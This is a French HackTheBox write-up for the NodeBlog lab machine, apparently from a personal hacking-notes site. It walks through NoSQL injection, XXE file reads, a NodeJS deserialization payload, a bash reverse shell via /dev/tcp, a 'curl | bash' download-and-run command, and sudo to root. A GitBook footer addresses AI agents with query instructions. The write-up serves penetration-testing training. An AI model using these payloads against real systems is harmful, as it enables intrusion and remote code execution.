> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/writeups-ctf/hackthebox/linux-easy/nodeblog-hackthebox-writeup.md).

# Compte rendu HackTheBox de NodeBlog

{% embed url="<https://app.hackthebox.com/machines/NodeBlog>" %}

{% hint style="warning" %}
**Compétences :**

* Injection NoSQL (contournement de l'authentification)
* Lecture de fichier XXE
* Attaque de désérialisation NodeJS (abus d'IIFE)
* Énumération de la base de données Mongo
  {% endhint %}

## Reconnaissance

**Vérification de la connectivité VPN**

Vérifiez la connectivité VPN pour assurer une communication stable avec la machine cible.

<figure><img src="/files/8a5de8286e645065a033a2a9817909657bc9939c" alt=""><figcaption></figcaption></figure>

**Découverte des ports ouverts avec Nmap :**

Énumérez les ports ouverts et exportez les résultats dans le fichier "allPorts" du répertoire Nmap :

```bash
nmap -p- --open -sS -n -Pn --min-rate 5000 -vvv 10.10.11.139
```

<figure><img src="/files/6a6892750c38239dd5b3f3367f955e54016a9110" alt=""><figcaption></figcaption></figure>

Scan des versions de ports avec Nmap 22.5000

Utilisez Nmap pour analyser les versions des services et enregistrer la sortie dans le fichier "targeted" :

```bash
nmap -sCV -p22,5000 10.10.11.139 -oN targeted
```

<figure><img src="/files/ce571fd5ad5b2339ba85d959d09a2b413b0c8f4b" alt=""><figcaption></figcaption></figure>

### Analyse du port 5000 - Application NodeJS

<figure><img src="/files/606b56f9dbe7bd1dbe30d44f6c0f91bd034361ec" alt=""><figcaption></figcaption></figure>

* Un panneau d'administration est découvert.
* Le `admin` l'utilisateur est valide.

<figure><img src="/files/7c1de50cd97830899d3e41dcd743021ad82f2e01" alt=""><figcaption></figcaption></figure>

## Vulnérabilité d'injection NoSQL (contournement de l'authentification)

Interception de la requête avec Burp Suite.

<figure><img src="/files/ce9852a616d23fc6789263fd17e9f3c9ed737a04" alt=""><figcaption></figcaption></figure>

Tester les payloads d'injection classiques :

```bash
username=admin&password[$ne]=toto
```

Cela ne fonctionne pas.

Convertir en JSON et changer le `Content-Type` en `application/json`:

```sql
{
  "user": "admin",
  "password": { "$ne": null }
}
```

Résultat : authentification réussie !

<figure><img src="/files/0e8837e1544af3ed9d9ca01dff7f71aefba6af2f" alt=""><figcaption></figcaption></figure>

## Exploitation de la vulnérabilité d'injection XXE

<figure><img src="/files/5bc9f78051932fe2178aa91cc7d288e033998218" alt=""><figcaption></figcaption></figure>

Envoi d'un fichier TXT : refusé, seuls les fichiers XML sont acceptés.

```
Bonjour, ceci est un test
```

<figure><img src="/files/aa2df0ce2a2bba09cd73e7b00b4febfd951a8bdf" alt=""><figcaption></figcaption></figure>

Format requis :

```xml
<post>
    <title>Exemple de publication</title>
    <description>Exemple de description</description>
    <markdown>Exemple de Markdown</markdown>
</post>
```

<figure><img src="/files/a53e208445b53f316ff570266335e140d2f44c75" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/7c9507d8395349945f295323259ee80e93c91731" alt=""><figcaption></figcaption></figure>

Envoi d'un fichier XML contenant une entité externe pour lire `/etc/passwd`:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ 
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<post>
    <title>Exemple de publication</title>
    <description>Exemple de description</description>
    <markdown>&xxe;</markdown>
</post>
```

Résultat : le contenu de `/etc/passwd` s'affiche.

<figure><img src="/files/b3b9cbdaaef7220038a7315898d39605710f3872" alt=""><figcaption></figcaption></figure>

* Découverte d'un utilisateur `admin`.

<figure><img src="/files/24d5dd128da4fd99193fa6b607fff0c82e173401" alt=""><figcaption></figcaption></figure>

Injection pour lire `/opt/blog/server.js` et identifier les identifiants stockés.

<figure><img src="/files/f991b96a8e805f4dcad1c181249d3122557f6d33" alt=""><figcaption></figcaption></figure>

```bash
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ 
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///opt/blog/server.js" >]>
<post>
    <title>Exemple de publication</title>
    <description>Exemple de description</description>
    <markdown>&xxe;</markdown>
</post>
```

<figure><img src="/files/c53b346d8f841cc996c9baf50d1694169fb02188" alt=""><figcaption></figcaption></figure>

## Exploitation de la désérialisation NodeJS

* Fonction découverte qui désérialise les cookies de session.

<div data-full-width="true"><figure><img src="/files/83d7633375e5f2456dcacb44cd52c5e3fd71c6f1" alt=""><figcaption></figcaption></figure></div>

Création d'un payload :

{% code overflow="wrap" %}

```javascript
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ping -c 1 10.10.14.61', function(error, stdout, stderr) { console.log(stdout) }); }()"}
```

{% endcode %}

Écoute du trafic ICMP avec :

```bash
tcpdump -i tun0 icmp -n
```

* Encodage d'URL :

<figure><img src="/files/6beb7542a0b82a11e865eb5e1ceca01f239d7c07" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```bash
%7b%22%72%63%65%22%3a%22%5f%24%24%4e%44%5f%46%55%4e%43%24%24%5f%66%75%6e%63%74%69%6f%6e%28%29%7b%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%28%27%70%69%6e%67%20%2d%63%20%31%20%31%30%2e%31%30%2e%31%34%2e%32%38%27%2c%20%66%75%6e%63%74%69%6f%6e%28%65%72%72%6f%72%2c%20%73%74%64%6f%75%74%2c%20%73%74%64%65%72%72%29%20%7b%20%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%73%74%64%6f%75%74%29%20%7d%29%3b%20%7d%28%29%22%7d
```

{% endcode %}

Construction d'une RCE via encodage d'URL et injection dans les cookies.

<figure><img src="/files/bb49f780be9d71be65e4dd9119a8186a5d226206" alt=""><figcaption></figcaption></figure>

```bash
tcpdump -i tun0 icmp -n
```

<figure><img src="/files/ced31e81bf4e12224de276a75ca99e058cc8488b" alt=""><figcaption></figcaption></figure>

### RCE - vulnérabilité de désérialisation (Node.js)

Création d'un `index.html` script de reverse shell :

```bash
#!/bin/bash 
bash -i >& /dev/tcp/10.10.14.61/443 0>&1
```

Démarrage d'un serveur HTTP :

```bash
python3 -m http.server 80
```

Écoute :

```bash
nc -nlvp 443
```

#### Envoi du payload :

{% code overflow="wrap" %}

```javascript
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('curl http://10.10.14.61 | bash', function(error, stdout, stderr) { console.log(stdout) }); }()"}
```

{% endcode %}

* Encodage d'URL :

{% code overflow="wrap" %}

```
%7b%22%72%63%65%22%3a%22%5f%24%24%4e%44%5f%46%55%4e%43%24%24%5f%66%75%6e%63%74%69%6f%6e%28%29%7b%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%28%27%63%75%72%6c%20%68%74%74%70%3a%2f%2f%31%30%2e%31%30%2e%31%34%2e%36%31%20%7c%20%62%61%73%68%27%2c%20%66%75%6e%63%74%69%6f%6e%28%65%72%72%6f%72%2c%20%73%74%64%6f%75%74%2c%20%73%74%64%65%72%72%29%20%7b%20%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%73%74%64%6f%75%74%29%20%7d%29%3b%20%7d%28%29%22%7d
```

{% endcode %}

Résultat : accès au shell obtenu.

<figure><img src="/files/7371420a7e5dea301fb20e6111773626588c07ff" alt=""><figcaption></figcaption></figure>

### Drapeau user.txt :)

<figure><img src="/files/e632aee5fa1513b6a1eb457d8db5c1e6cfce11d4" alt="" width="563"><figcaption></figcaption></figure>

## Élévation de privilèges

### Énumération de la base de données Mongo

<figure><img src="/files/a5318c2b1089412b153a5f8212c4dee92129f098" alt=""><figcaption></figcaption></figure>

Connexion à la base de données MongoDB (port 27017 ouvert) :

```bash
mongo
show dbs
use blog
show tables
db.users.find()
```

<figure><img src="/files/84a4be3c6ea477244da2948011cae7beed5db49a" alt="" width="563"><figcaption></figcaption></figure>

* user: admin
* mot de passe : IppsecSaysPleaseSubscribe

<figure><img src="/files/afa9b0c68693f57843ec75aa343d2179ff6879aa" alt=""><figcaption></figcaption></figure>

### Sudo (ALL:ALL)

Vérification des privilèges sudo :

```bash
sudo -l
```

Résultat : l'utilisateur admin peut exécuter `sudo su` sans mot de passe.

<figure><img src="/files/56d217d7eaf9807a4e0c938b37c7544b7a61fcda" alt=""><figcaption></figcaption></figure>

Passage en root :

```bash
sudo su
```

<figure><img src="/files/f3c3958596b54263128e56bfc9b24281a9fbc18a" alt="" width="563"><figcaption></figcaption></figure>

### Drapeau root.txt :)

<figure><img src="/files/647de11646770c58bf8d84cc32c047118b9fbe21" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/91e3cb88c4c4b159b909f968d48e6f3f6b32575f" alt="" width="338"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/writeups-ctf/hackthebox/linux-easy/nodeblog-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
